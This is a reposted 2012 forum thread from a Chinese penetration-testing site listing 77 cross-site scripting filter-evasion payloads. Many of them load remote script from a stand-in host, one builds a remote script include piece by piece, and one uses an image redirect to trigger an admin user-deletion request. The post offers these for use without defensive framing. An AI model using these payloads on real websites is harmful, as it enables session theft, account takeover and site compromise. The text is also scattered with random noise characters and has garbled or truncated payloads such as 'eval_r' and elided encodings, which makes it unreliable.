中国网络渗透测试联盟

标题: xss跨站脚本攻击汇总 [打印本页]
作者: admin    时间: 2012-9-5 14:56
标题: xss跨站脚本攻击汇总
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。0 F8 |7 y9 _$ n8 C4 H: h

6 M! r9 H2 a, | (1)普通的XSS JavaScript注入
, y% B6 R0 _9 L3 K <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
, d$ ~# m8 h4 D0 f/ k+ ~
+ m1 R6 F& E$ K (2)IMG标签XSS使用JavaScript命令) H. v/ p. g8 x9 {5 V
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>* o2 s( P" r( \8 f1 A0 o: D+ Z

% R5 S( K! A/ T5 q! Z (3)IMG标签无分号无引号& l3 K4 [  z$ A4 f% ^
<IMG SRC=javascript:alert(‘XSS’)>
, T9 O3 E2 Y7 M
- r1 T8 Y' I$ G. {7 d. z- E (4)IMG标签大小写不敏感, g: T/ A% f8 d" k
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
; a; |  L- p- Q2 [* E8 }$ S; J$ K4 }# o5 r0 D" z- P; Q
(5)HTML编码(必须有分号)
- z) ?7 ?1 a3 u' ]/ x/ n# V; H! q <IMG SRC=javascript:alert(“XSS”)>
5 c( z1 h: C7 |2 u' r) ^! G+ ?% M- h: n+ U3 ~% R5 J" h' `3 j
(6)修正缺陷IMG标签8 d' h& @5 F, s! Q$ X% B$ M: E
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
3 q6 l& }* V" ^+ C7 M' x
; G( ]4 P3 g+ I* F; J (7)formCharCode标签(计算器)1 ?4 m; b* q4 _" B
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>" f1 Q7 @9 J, l, M% [
: c6 Y# y7 u2 b, g
(8)UTF-8的Unicode编码(计算器)
& @5 l5 D4 \! q <IMG SRC=jav..省略..S')>
, l5 x2 o) ?) Q+ k& v  V! Y% N& X2 Y+ [2 f5 c
(9)7位的UTF-8的Unicode编码是没有分号的(计算器), f. q! W8 G7 C* K
<IMG SRC=jav..省略..S')>
' Q# `/ b6 `6 l$ I0 B5 M: {8 V' c3 p
(10)十六进制编码也是没有分号(计算器)
9 Y  m% E) ?3 T) y) }; q <IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
! v) p! u0 y. N5 f! m* [- y, z
3 v- Q) L5 E- ~% D" n (11)嵌入式标签,将Javascript分开
& m$ t0 x$ M1 [6 q1 Y+ F <IMG SRC=”jav ascript:alert(‘XSS’);”>
$ ?& C2 r1 W# n, C3 S" z
7 _6 F8 i" m  P; H (12)嵌入式编码标签,将Javascript分开
" P2 I5 M  L4 A$ f6 s <IMG SRC=”jav ascript:alert(‘XSS’);”>* |) B6 U6 X3 n/ u, s9 Y$ e

2 ?3 `! L* E9 B/ w2 j/ e (13)嵌入式换行符  N7 R0 n; |( a' M" [. Z2 p+ L
<IMG SRC=”jav ascript:alert(‘XSS’);”>; l, V- R$ L; G& b
( Q( D4 w8 q1 e/ J$ }. [- q3 e
(14)嵌入式回车  |" u1 S+ ?3 e1 \2 z
<IMG SRC=”jav ascript:alert(‘XSS’);”>
' u/ q9 c# j# d+ \- Y3 n+ g, c  n- Z# J- r9 V( N4 l, h) W
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
- T3 U, u) m2 Y1 V% ~ <IMG SRC=”javascript:alert(‘XSS‘)”>
& A$ S+ h5 Z: c) G- b6 C" d8 ^, x+ j
(16)解决限制字符(要求同页面)' w( H, E8 e  \% k  }/ b5 p
<script>z=’document.’</script>& Q4 m3 U/ C9 h1 n
<script>z=z+’write(“‘</script>. ^, Z# e$ c1 [$ N- h: m$ r, E
<script>z=z+’<script’</script>8 j- A( U3 d6 H" Y$ C6 J% C% _. ^
<script>z=z+’ src=ht’</script>
/ e* A3 f! K  l5 ^8 b; g <script>z=z+’tp://ww’</script>
' Q0 X. M; G  h <script>z=z+’w.shell’</script>
% {8 ^3 }* m7 e- S <script>z=z+’.net/1.’</script>
0 R2 G% m0 |) E( O <script>z=z+’js></sc’</script>( E5 ]- ]( W; G0 B  {1 A& x
<script>z=z+’ript>”)’</script>6 B, \3 t, n2 _5 `  A% \
<script>eval_r(z)</script>
5 l8 \* U" S  }5 i/ k  O2 I+ F9 q2 z& o) g3 b3 \- ^* N; K( e! S
(17)空字符: Y( _: Y# d9 r$ g8 s
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
6 F8 E( x$ c$ ]1 ?
, B; w5 U8 s6 N2 \ (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
, |7 u% u' H  ]. t perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out  P0 p3 k: e5 b1 g6 X: T

" y( C7 [, ?& r9 \$ m" }* V (19)Spaces和meta前的IMG标签1 R' O9 o5 N' J. J
<IMG SRC=”   javascript:alert(‘XSS’);”>5 m* c" D  _0 O* y; z
2 J0 Z- k6 Q: V( D
(20)Non-alpha-non-digit XSS
) c" Y9 C2 {/ S- T8 U; R <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
3 S8 o) Y. m9 @/ l$ B7 \& G# ?: _% y- M( \( W
(21)Non-alpha-non-digit XSS to 2
  e: E9 v* G+ I& p+ X8 o$ | <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>! Q8 _2 p6 r+ A5 h
, ~. C/ r! i9 a
(22)Non-alpha-non-digit XSS to 3+ v4 \% e% N0 a( k/ r: s3 o; m
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
  u( Z- r" N: x' a: y* Q. |
5 f$ Z- {  m/ k0 { (23)双开括号- _& a$ s; l0 Y2 V: Z
<<SCRIPT>alert(“XSS”);//<</SCRIPT>, z- d5 X8 ]8 G( i' _2 u" Y; b
5 K; z5 I  G& q9 i0 r4 x
(24)无结束脚本标记(仅火狐等浏览器): A2 y  X. ~, v! Q
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
7 |) H) `( a) g$ G% @/ _; \
' N. v. k  m. D (25)无结束脚本标记2
7 V! B" W& Y: n  h) N# F6 V0 v <SCRIPT SRC=//3w.org/XSS/xss.js>
1 O' _: R! @( e* s$ L
; Y) T# ~" u/ x  v  [' S (26)半开的HTML/JavaScript XSS
3 B8 X, m9 ?: c7 t$ \* i <IMG SRC=”javascript:alert(‘XSS’)”
) y' H/ U& n, B2 K4 V. u, @- W& j+ E# y4 h# t: x
(27)双开角括号/ `4 x+ ]. l: U: n0 l9 d" @
<iframe src=http://3w.org/XSS.html <, q2 \' r( d2 a. {7 H$ ^% y

0 P& M( G3 c/ h2 c) R5 Z: T2 q$ {1 ] (28)无单引号 双引号 分号
2 l" a) g# ?% ~) F: M' E+ T <SCRIPT>a=/XSS/
$ I, y9 O" `8 U/ ^7 d3 G alert(a.source)</SCRIPT>
2 h* Z# N9 O6 f3 y/ M3 L+ J2 g" @% n6 y+ m$ S: B0 k
(29)换码过滤的JavaScript* a1 I" S( _1 Y
\”;alert(‘XSS’);//0 x% e; X& q7 V/ N' A9 R% }9 U' w

) m9 b2 G1 `% F  k2 Z  L. c) ]& x (30)结束Title标签" c; P; y9 o1 ~/ i6 ?- I% h
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
3 I! Z  A  `) z" G& ~, d* Q* G* k
7 w8 Z) ?, T# u0 z$ H$ I. c (31)Input Image7 y# e3 E! u# l: o# D1 @
<INPUT SRC=”javascript:alert(‘XSS’);”>3 ?5 C; Y) h9 n0 k! T0 @) [
( B9 V( Y$ s) k. J' U% n
(32)BODY Image* L( D2 R8 R! \1 ^" b+ _% f/ c
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
/ ^1 Z! t# H8 M  X0 N6 @" v1 c
. j* R* {1 g  U" \. s1 C (33)BODY标签
+ J7 q4 _$ g1 ~" b( H+ p <BODY(‘XSS’)>
7 _4 H! ]) Z( ~/ M% I! A9 O* e+ p8 m/ F* _% W, v
(34)IMG Dynsrc
: ^7 L$ D8 Y; _  }9 ? <IMG DYNSRC=”javascript:alert(‘XSS’)”>1 t# D7 N+ v2 q+ s# r- p

/ ^* r; c7 X, U  h: ^ (35)IMG Lowsrc) U% P9 q7 C3 C, [/ h+ S$ |- `
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
  q* e3 Y6 b  x4 C6 K' P% k+ M0 a9 H8 f! `- O. E
(36)BGSOUND$ Q) u8 v, F$ m) e6 M6 d9 v8 \
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
# s& D! i' K/ P- y/ z
( e% Y3 _2 n! m1 h (37)STYLE sheet4 \& q7 T+ v  m8 q' _4 ^, p
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>0 E3 k& |3 O& O
  B' ]6 h6 \3 [; K2 ~# _2 w$ E
(38)远程样式表- @+ w! w5 Z  v/ ]
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
  [( p- e; Y% b% U( @0 O' `
' [/ m$ Q. k/ _+ Z1 t" s; B (39)List-style-image(列表式)
: o: @8 R0 W3 i8 ~) O" C <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
, V; j2 b, {' y3 r0 _$ b# K
6 f& _% }' v/ E1 e- V- U (40)IMG VBscript. d  U& o; S: g* |( C+ X
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
! {1 h1 \1 a3 v3 Q" z3 H3 o) ^4 h4 H4 L5 a
(41)META链接url
: A% u6 f, d& q4 i3 f7 k: A <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
4 {$ K' e, o( g. U  L4 [* o! c3 \& B9 a( @
(42)Iframe+ @7 r9 D$ B. L2 `9 A, G0 w
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>* Q! l  g$ c7 M/ k' w4 t

) x  H5 P. m) \ (43)Frame
3 m& n) @! o+ Q <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>" L( `% Y2 G% t. x2 Q: r+ N: ]

, Z9 l) u" ~3 }6 r3 v# O% t( @ (44)Table! g, U; R+ K& M5 o+ `* \0 S
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>6 J( a! ]: v( ^3 i! `

6 U. K  o# q: y  c (45)TD7 A/ o4 j, U: u* D  T/ T2 d" ]
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>3 c% z, w. O7 |  A

, A8 H7 I8 X$ F6 K8 I7 ~' u (46)DIV background-image
& w% d' m% e# c  ^: P$ f <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
" w- h, Z% r7 c6 ^/ u) k0 _
  C! G6 Q7 E9 P7 h% G (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
5 l0 w- l9 Z) j! | <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>$ c0 |! }; e; d. [9 F
& ]& X# C  ]9 }; u: O$ a% Z
(48)DIV expression- P2 g% @& l& m7 S; u! H: X& D
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
# Z7 X: N6 a0 t  {$ ~( N! V
, h6 }% s4 \8 y2 t+ k; @ (49)STYLE属性分拆表达
) G2 l* e+ X  X6 k6 z <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
& G3 s, \6 h. @2 {3 [
0 F; J6 t5 V5 P7 [8 ^: J (50)匿名STYLE(组成:开角号和一个字母开头)3 C( R9 V) j, M5 D: \
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
3 ], U: D. Z, s. j3 n' [
7 ]: y9 S. T" U$ g+ W4 f& Z2 \ (51)STYLE background-image9 r5 j% q  e+ b% F; u
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>; b7 D' z5 \! A4 q/ R% ?

8 O3 T2 X+ `: V+ e7 {' M/ A1 Z (52)IMG STYLE方式
7 L: h3 m% P! C# E/ D exppression(alert(“XSS”))’>
# v5 @# M* v  |9 u, ~  j4 M: m3 {* U
, F+ X! w! F2 E9 h8 H& g (53)STYLE background# }  K( f2 J7 \, J# ~1 u+ C1 C
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>+ J3 x( \6 V1 a
* s  ~; i; n2 K
(54)BASE9 q7 U0 i: R; `+ L( N+ @3 l
<BASE HREF=”javascript:alert(‘XSS’);//”>
8 W) Y9 M! n; e( H9 @6 h. S! ?* f7 F. `0 p* n9 t3 Z. t
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
9 `. }' {- d, k+ u) q <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>) g& i; S0 f* u% J
/ Q. i* _6 u. M4 G& \
(56)在flash中使用ActionScrpt可以混进你XSS的代码1 P& R9 Q0 H! a* \6 u1 i* Y3 S
a=”get”;: ^+ U' m; n7 {! \, B5 X
b=”URL(\”";* J7 n" d8 `4 K" e* ~7 k+ L
c=”javascript:”;0 C8 i6 O0 `% C
d=”alert(‘XSS’);\”)”;: l9 k, k. y9 \; }
eval_r(a+b+c+d);
0 k: p! a% V7 Y
1 i  m/ \/ U! Y/ X5 y3 {" @ (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
/ ~# q. A2 Y- b6 L: l <HTML xmlns:xss>, @' u" r8 j7 B0 R
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>' K( Z7 v9 B( I! T" X
<xss:xss>XSS</xss:xss>
' Y9 }$ U+ e$ g; h3 ^' I </HTML>
) r/ F7 O* n. B4 r; a, ]
# k; ~# g# D. n7 T$ Z+ a (58)如果过滤了你的JS你可以在图片里添加JS代码来利用
6 c$ e) I7 R/ P7 H0 y <SCRIPT SRC=””></SCRIPT>' g6 K  B- W- J4 V( k4 L; ^: t

# l' r" M: q- B# f: t) j( b (59)IMG嵌入式命令,可执行任意命令- H9 t; @) B  D  j# \" |
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
2 ^* V% x+ Z$ i4 c# ~) V$ w4 o* d8 u- u; r1 L. A, K, R( v% b
(60)IMG嵌入式命令(a.jpg在同服务器)6 ]; O5 {% j! x! S& A9 o
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
0 X6 C/ H( B. x; g1 I; Y  n- ~' l" A1 _
(61)绕符号过滤
- o' g& ]3 Z7 a8 O$ ~ <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
( U* j% }3 Z9 ~' y2 m1 I- G" [# \8 F6 Z/ U( ]1 x$ Q
(62); i$ q2 f+ d& U0 V$ e
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
' o4 [3 `6 E& @) C9 `5 q
" K% Q$ z: d* {8 O) ?" m (63)
* _5 B0 {2 V& u$ e( v1 Y <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
: v# u. L, k& d/ X
' W! s' P$ F+ ^3 c (64)
. Y3 E: M( _, i+ J# X+ k2 k3 Z <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
( {$ O$ _* E1 Z: p6 M( g# g( L" h2 J& q7 n5 ^
(65)
6 [) Z, V$ E/ I! M9 c: z1 L7 z <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>- g5 _4 Z2 h2 O" z* L  L8 g

9 v# N' N! d" O; I2 ~$ l, q (66)
0 e* D- t; u! X <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
" V, R3 F+ i0 B. _9 a" q
  Y, Y) T3 @3 W% z6 C& M (67)/ G7 C+ v) a7 ?# ]) Q, l8 U* n
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
2 V# ~) y- m0 Q8 u% r9 _  ^( |5 _" m* I+ ^. x
(68)URL绕行& i- ~1 i; a7 V" w
<A HREF=”http://127.0.0.1/”>XSS</A>% A& K  a4 n, B
- k. |$ N. h+ e' ^7 R  y0 c
(69)URL编码
0 N" r" _8 n, ^1 t <A HREF=”http://3w.org”>XSS</A>' Q8 M( K  v( G$ m7 [* G1 l! H) t. Q
7 b, K' E  z! e1 n  k' i3 X
(70)IP十进制
' ]# h* Y4 I' [7 t* J# H <A HREF=”http://3232235521″>XSS</A>' B" k# l4 a- p4 h5 d) S& X5 h

4 Y) O) ^* R  p1 Q; V: P( s$ Q* x (71)IP十六进制: T4 @+ J- z/ {; S
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>) R, M" A: \1 Y" e+ L! K5 X
( [% i( h2 _! Z% j( }
(72)IP八进制/ F1 ]4 ~: w* Q# H; O
<A HREF=”http://0300.0250.0000.0001″>XSS</A>8 i- L( i! l8 ]8 ?8 b) T! ]( K7 [
# O, S5 N* b& j7 n+ m$ ~
(73)混合编码/ ?) s6 c, X, G- j. X
<A HREF=”h. G) e. J, k; k' Y# }. a2 }
tt p://6 6.000146.0×7.147/”">XSS</A>
' Q- G+ \- I' w1 @; q+ `; P: R3 y& z: V( G/ L. ^  j. x) ?* o
(74)节省[http:]! u- Q% c6 Q1 V# G
<A HREF=”//www.google.com/”>XSS</A>% _8 C3 b# Z& ?6 W( ~

4 M3 H( C6 X4 `; i, Y (75)节省[www]! D; M: ], p1 z
<A HREF=”http://google.com/”>XSS</A>
/ a% @7 j  [+ E0 h6 i& Y
0 o2 h+ X* j' G9 o (76)绝对点绝对DNS+ E$ C# O! I% |8 U! f6 i2 R' Q
<A HREF=”http://www.google.com./”>XSS</A>3 s1 D# ]! h4 D  h, E
9 O; ~& n0 Z' {, E1 o
(77)javascript链接
9 J/ K5 G1 |: @% [. B: S <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2